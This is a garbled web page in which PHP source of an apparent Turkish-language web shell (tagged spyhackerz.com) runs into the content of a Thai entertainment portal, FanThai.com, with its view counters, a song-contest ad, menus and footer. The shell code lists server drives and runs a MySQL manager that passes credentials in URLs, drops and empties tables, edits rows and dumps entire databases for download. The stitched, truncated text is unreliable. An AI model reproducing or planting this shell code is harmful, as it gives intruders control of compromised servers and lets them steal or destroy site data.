"; $letters = ""; if ($win) { $v = explode("\\",$d); $v = $v[0]; foreach (range("a","z") as $letter) { $bool = $isdiskette = in_array($letter,$safemode_diskettes); if (!$bool) {$bool = is_dir($letter.":\\");} if ($bool) { $letters .= "[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "".$letter."";} $letters .= " ] "; } } if (!empty($letters)) {echo "Bulunan Suruculer: ".$letters."
";} } if (count($quicklaunch) > 0) { foreach($quicklaunch as $item) { $item[1] = str_replace("%d",urlencode($d),$item[1]); $item[1] = str_replace("%sort",$sort,$item[1]); $v = realpath($d.".."); if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} $item[1] = str_replace("%upd",urlencode($v),$item[1]); echo "".$item[0]."    "; } } echo "


"; if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
".$donated_html."

";} echo "
"; if ($act == "") {$act = $dspact = "ls";} if ($act == "sql") { $sql_surl = $surl."act=sql"; if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} $sql_surl .= "&"; ?>

Dikkat! SQL-Manager i Hazirda DEGiL.

"; if (!$sql_sock) {?>
SQL Manager:
"; if (!$sql_sock) { if (!$sql_server) {echo "Baglanilamadi";} else {echo "
Baglanilamadi
"; echo "".$err."";} } else { $sqlquicklaunch = array(); $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); $sqlquicklaunch[] = array("Logout",$surl."act=sql"); echo "
MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
"; if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} echo "
"; } echo "
 • Eger sifre gecersizse ,admin olan sifredir .
 • Eger host, gecersizse, host, localhosttur
 • Eger port gecersizse normal port "3306"
 •  Lutfen formu doldur:
  Username(K.Adi)Password(Sifre) Database 
  HostPORT
  ">Home
  ".htmlspecialchars($sql_db)." ]---
  "; $c = 0; while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo " ".htmlspecialchars($row[0])." (".$count_row[0].")
  "; mysql_free_result($count); $c++;} if (!$c) {echo "Databasede tablo bulunamadi!";} } } else { ?>
  Home

  Lutfen Database secin
  "; //Start center panel $diplay = true; if ($sql_db) { if (!is_numeric($c)) {$c = 0;} if ($c == 0) {$c = "no";} echo "
  Bu Databasede ".$c." table(s) Tablo var! (".htmlspecialchars($sql_db).").
  "; if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} echo "
  "; $acts = array("","dump"); if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} elseif ($sql_tbl_act == "insert") { if ($sql_tbl_insert_radio == 1) { $keys = ""; $akeys = array_keys($sql_tbl_insert); foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} $values = ""; $i = 0; foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; $sql_act = "query"; $sql_tbl_act = "browse"; } elseif ($sql_tbl_insert_radio == 2) { $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; $result = mysql_query($sql_query) or print(mysql_smarterror()); $result = mysql_fetch_array($result, MYSQL_ASSOC); $sql_act = "query"; $sql_tbl_act = "browse"; } } if ($sql_act == "query") { echo "
  "; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
  ".$sql_query_error."
  ";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) {echo "
  "; if (($sql_query) and (!$submit)) {echo "Gercekden istionmu Kardes:";} else {echo "SQL-Query :";} echo "   
  ";} } if (in_array($sql_act,$acts)) { ?>
  Yeni Tablo olustur:
   
  Dump DB:
  "> 
  ";} if ($sql_act == "newtbl") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo " \"".htmlspecialchars($sql_newdb)."\" Yeni database olusturuldu!
  "; } else {echo "Database Olusturulamadi \"".htmlspecialchars($sql_newdb)."\".
  Reason: ".mysql_smarterror();} } elseif ($sql_act == "dump") { if (empty($submit)) { $diplay = false; echo "
  SQL-Dump:

  "; echo "DB: 

  "; $v = join (";",$dmptbls); echo "Only tables (explode \";\") 1: 

  "; if ($dump_file) {$tmp = $dump_file;} else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} echo "File: 

  "; echo "Download:  

  "; echo "Save to file:  "; echo "  1 - all, if empty"; echo "
  "; } else { $diplay = true; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0; $set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = true; $set["onlytabs"] = array(); if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} $ret = mysql_dump($set); if ($sql_dump_download) { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($ret)); header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); echo $ret; exit; } elseif ($sql_dump_savetofile) { $fp = fopen($sql_dump_file,"w"); if (!$fp) {echo "Dump hatasi OLusturulamadi \"".htmlspecialchars($sql_dump_file)."\"!";} else { fwrite($fp,$ret); fclose($fp); echo "Dumped(Dokuldu)! Dump Yazildi \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; } } else {echo "Dump: hicbirsey yapilamadi!";} } } if ($diplay) { if (!empty($sql_tbl)) { if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); $count_row = mysql_fetch_array($count); mysql_free_result($count); $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); $tbl_struct_fields = array(); while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} $perpage = $sql_tbl_le - $sql_tbl_ls; if (!is_numeric($perpage)) {$perpage = 10;} $numpages = $count_row[0]/$perpage; $e = explode(" ",$sql_order); if (count($e) == 2) { if ($e[0] == "d") {$asc_desc = "DESC";} else {$asc_desc = "ASC";} $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; } else {$v = "";} $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; $result = mysql_query($query) or print(mysql_smarterror()); echo "
  Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
  "; echo "Structure ]   "; echo "Browse ]   "; echo "Dump ]   "; echo "Insert ]   "; if ($sql_tbl_act == "structure") {echo "

  spyhackerz.com ";} if ($sql_tbl_act == "insert") { if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} if (!empty($sql_tbl_insert_radio)) { } else { echo "

  Row u tabloya sok :
  "; if (!empty($sql_tbl_insert_q)) { $sql_query = "SELECT * FROM `".$sql_tbl."`"; $sql_query .= " WHERE".$sql_tbl_insert_q; $sql_query .= " LIMIT 1;"; $result = mysql_query($sql_query,$sql_sock) or print("

  ".mysql_smarterror()); $values = mysql_fetch_assoc($result); mysql_free_result($result); } else {$values = array();} echo "
  "; foreach ($tbl_struct_fields as $field) { $name = $field["Alan"]; if (empty($sql_tbl_insert_q)) {$v = "";} echo ""; $i++; } echo "
  AlanTipFonksiyonValue
  ".htmlspecialchars($name)."".$field["Tip"]."

  "; echo "Yeni ilave sok"; if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} echo "

  "; } } if ($sql_tbl_act == "browse") { $sql_tbl_ls = abs($sql_tbl_ls); $sql_tbl_le = abs($sql_tbl_le); echo "
  "; echo "\"Sayfalar\" "; $b = 0; for($i=0;$i<$numpages;$i++) { if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} echo $i; if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} if (($i/30 == round($i/30)) and ($i > 0)) {echo "
  ";} else {echo " ";} } if ($i == 0) {echo "empty";} echo "
  From:  To:  
  "; echo "
  "; echo ""; echo ""; for ($i=0;$i"; if (empty($e[0])) {$e[0] = "a";} if ($e[1] != $v) {echo "".$v."";} else {echo "".$v."\"".$m."\"";} echo ""; } echo ""; echo ""; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { echo ""; $w = ""; $i = 0; foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} echo ""; $i = 0; foreach ($row as $k=>$v) { $v = htmlspecialchars($v); if ($v == "") {$v = "NULL";} echo ""; $i++; } echo ""; echo ""; } mysql_free_result($result); echo "
  Action
  ".$v.""; echo "\"SIL\" "; echo "\"Duzenle\" "; echo "

   

  "; } } else { $result = mysql_query("SHOW TABLE STATUS", $sql_sock); if (!$result) {echo mysql_smarterror();} else { echo "
  "; $i = 0; $tsize = $trows = 0; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $tsize += $row["Data_length"]; $trows += $row["Rows"]; $size = view_size($row["Data_length"]); echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; เข้าชมแล้ว ( 1120) ครั้ง
  hahaha
  hahaha
  ahahahhaahah เข้าชมแล้ว ( 254) ครั้ง

  เข้าชมแล้ว ( 1181) ครั้ง

  เข้าชมแล้ว ( 1429) ครั้ง
  พี่ ๆ SPF & Radio Garden ชวนมาโชว์ลูกคอ คว้าเงินแสน !!
  พี่ ๆ SPF & Radio Garden ชวนมาโชว์ลูกคอ คว้าเงินแสน !!
  อัดคลิป Cover เพลง เสียงเพลงในใจฉัน หรือ คนไหนไม่สำคัญ ในสไตส์ของตัวเพื่อน ๆ เอง แล้วอัพโหลดขึ้น youtube แล้วนำลิ้งค์มาสมัคร Like เยอะสุดรับไปเลย 25,000 บาท รางวัลอื่นๆคลิ้กดูเลย แค่ อัดคลิป / อัพโหลด / สมัคร / แชร์ แค่เนี้ยง่ายมากๆ ช้าอดหมดได้ตังค์นะจ๊ะ .... พร้อมแล้ว กดสมัครได้ที่ ------->>> http://www.mono-music.com/lovesongcovercontest/ คนไหนไม่สำคัญ : Radio Garden [Official MV] http://www.youtube.com/watch?v=MUYC1y4jaus เสียงเพลงในใจฉัน - SPF [Official MV] http://www.youtube.com/watch?v=w_VvEarZI8c เข้าชมแล้ว ( 9950) ครั้ง
  เมนูแฟนไทยละคร
  ดูการ์ตูน
  ดูซิทคอมย้อนหลัง
  ดูละครย้อนหลัง
  Korea Variety Show
  ดูรายการพิเศษ
  ดูรายการช่อง 3
  ดูรายการช่อง 5
  ดูรายการช่อง 9
  Table
  RowsTypeOlusturdModifiedSizeAction
   ".$row["Name"]." ".$row["Rows"]."".$row["Tip"]."".$row["Olusturma Zamani"]."
  เมนูแฟนไทยละคร
  ข่าว บันเทิง วาไรตี้
  ข่าวเด่นวันนี้ เล่นเกมส์ ดูดวง
  ข่าวบันเทิง ฟังเพลง ท่องเที่ยว
  ข่าวกีฬา ดูหนัง ผู้หญิง
  ข่าวต่างประเทศ ดูทีวี เซ็กส์ความรัก
    ฟังวิทยุ สัตว์เลี้ยง
  บริการ ดูซีรีย์เกาหลี บทกลอน
  แฟนไทยตลาด ดูทีวีย้อนหลัง ตกปลา
  หางาน รูปภาพ  
  เว็บบอร์ด รูปภาพ SEXY GIRL  
    วีดีโอคลิป  
  WWW.FANTHAI.COM
  ติดต่อเรา • ร่วมงานกับเรา • ข้อกำหนด • นโยบายความเป็นส่วนตัว • ลงโฆษณา ติดต่อโฆษณา : 02-5783907-8 จันทร์-ศุกร์ 9.00น. - 18.00น. Copyright © 2012 FanThai.com All rights reserved.